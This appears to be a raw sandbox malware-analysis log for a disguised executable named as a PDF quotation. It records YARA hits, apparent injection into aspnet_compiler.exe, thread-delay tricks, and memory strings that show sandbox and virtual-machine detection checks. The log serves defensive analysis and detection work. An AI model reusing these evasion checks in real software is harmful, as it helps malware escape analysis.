Source: Yara match	File source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.119775b0000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1196edbfa50.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2638636004.000001195ECF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2653712164.00000119775B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe PID: 2132, type: MEMORYSTR

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_00007FF848F480FB push ebx; ret	0_2_00007FF848F4816A
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_00007FF848F419BD push E95D7018h; ret	0_2_00007FF848F419F9
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_00007FF848F4FCE4 pushfd ; retf	0_2_00007FF848F4FCEB
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_00007FF84915539D push eax; iretd	0_2_00007FF8491555DD

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195ECF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: EXPLORER SBIEDLL.DLL!CUCKOOMON.DLL"WIN32_PROCESS.HANDLE='{0}'#PARENTPROCESSID$CMD%SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE&VERSION'SERIALNUMBER)VMWARE\|VIRTUAL\|A M I\|XENSELECT FROM WIN32_COMPUTERSYSTEM+MANUFACTURER,MODEL-MICROSOFT\|VMWARE\|VIRTUAL.JOHN/ANNA0XXXXXXXX
Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195ECF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL2

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Memory allocated: 1195D040000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Memory allocated: 11976BA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory allocated: 1F59E050000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory allocated: 1F5B7980000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599855	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599748	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599629	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598952	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598515	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598260	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598046	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597496	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596510	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595952	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595624	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595296	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595186	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594640	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594531	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Window / User API: threadDelayed 7548	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Window / User API: threadDelayed 2291	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Window / User API: threadDelayed 1208	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Window / User API: threadDelayed 8651	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -27670116110564310s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 1892	Thread sleep count: 7548 > 30	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 1892	Thread sleep count: 2291 > 30	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -99890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -99781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -99671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -99562s >= -30000s	Jump to behavior
